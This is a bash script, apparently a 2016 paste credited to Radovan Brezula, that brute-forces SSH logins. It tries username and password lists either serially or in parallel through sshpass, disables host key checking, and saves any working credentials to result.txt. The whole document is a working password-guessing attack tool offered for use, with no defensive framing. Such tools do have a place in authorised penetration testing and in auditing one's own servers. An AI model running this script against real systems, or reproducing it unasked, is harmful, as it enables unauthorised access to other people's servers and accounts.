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Mar 29th, 2016
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  1. #!/bin/bash
  3. function usage {
  4. echo -e "Usage: $0 [OPTIONS]"
  5. echo "OPTIONS: "
  6. echo -e " -a IP address of SSH server"
  7. echo -e " -d TCP port 1 - 65535 of SSH server "
  8. echo -e " -l parallel dictionary attack"
  9. echo -e " -n slow down attack (parallel guessing only)"
  10. echo -e " number seconds e.g. 1, 0.1, 0.01, etc."
  11. echo -e " -p path to file with passwords"
  12. echo -e " -u path to file with usernames"
  13. echo -e " -v display version"
  14. echo -e " -h display help"
  15. }
  17. function version
  18. {
  19. echo -e " 0.1"
  20. echo -e "Copyright (C) 2016 Radovan Brezula 'brezular'"
  21. echo -e "License GPLv3+: GNU GPL version 3 or later <>."
  22. echo -e "This is free software: you are free to change and redistribute it."
  23. echo -e "There is NO WARRANTY, to the extent permitted by law."
  24. exit
  25. }
  29. function read_args {
  30. while getopts "a:d:n:p:u:lhv" arg; do
  31. case "$arg" in
  32. a) ip="$OPTARG";;
  33. d) port="$OPTARG";;
  34. n) nval="$OPTARG";;
  35. p) passlist="$OPTARG";;
  36. u) userlist="$OPTARG";;
  37. l) parallel=1;;
  38. v) version;;
  39. h) usage
  40. exit;;
  41. esac
  42. done
  43. }
  45. function check_args {
  46. [ -f result.txt ] && echo "File 'result.txt' exists, exiting" && exit
  48. type -P sshpass 1>/dev/null
  49. [ "$?" -ne 0 ] && echo "Binary 'sshpass' not found, exiting" && exit
  51. if [ -z "$ip" ]; then
  52. echo "IP address can't be empty, exiting"
  53. exit
  54. else
  55. echo "$ip" | grep -w "^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}.[0-9]\{1,3\}$" 1>/dev/null
  56. [ "$?" -ne 0 ] && echo "'$ip' is not valid IP address, exiting" && exit
  57. fi
  59. [ -z "$nval" ] && nval=0.01
  61. if [[ "$port" =~ ^[[:digit:]]+$ ]]; then
  62. if ( [ "$port" -gt 65535 ] || [ "$port" -eq 0 ] ); then
  63. echo "TCP port has to be in range 1 - 65535"
  64. exit
  65. fi
  66. else
  67. echo "TCP port must be digit, exiting"
  68. exit
  69. fi
  71. [ ! -f "$passlist" ] && echo "Can't find file with list of passwords, exiting" && exit
  72. [ ! -f "$userlist" ] && echo "Can't find file with list of users, exiting" && exit
  73. }
  75. function launch_serial_attack {
  76. while read user; do
  77. while read pass; do
  78. echo "Trying username: '$user' and password: '$pass'"
  79. sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null
  80. if [ "$?" -eq 0 ]; then
  81. echo "*** Attack finished! Found username is: '$user' and password: '$pass' ***" > result.txt
  82. cat result.txt
  83. exit
  84. fi
  85. done < "$passlist"
  86. done < "$userlist"
  87. }
  89. function launch_parallel_attack {
  90. sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null
  91. if [ "$?" -eq 0 ]; then
  92. echo "*** Attack finished! Found username: '$user' and password: '$pass' ***" > result.txt
  93. exit
  94. fi
  95. }
  97. ### BODY ###
  98. read_args $@
  99. check_args
  101. if [ "$parallel" -eq 1 ]; then
  102. while read user; do
  103. while read pass; do
  104. if [ ! -f result.txt ]; then
  105. echo "Trying username: '$user' and password: '$pass'"
  106. launch_parallel_attack &>/dev/null &
  107. else
  108. cat result.txt
  109. pkill sshpass &>/dev/null
  110. exit
  111. fi
  112. sleep $nval
  113. done < "$passlist"
  114. done < "$userlist"
  115. else
  116. launch_serial_attack
  117. fi
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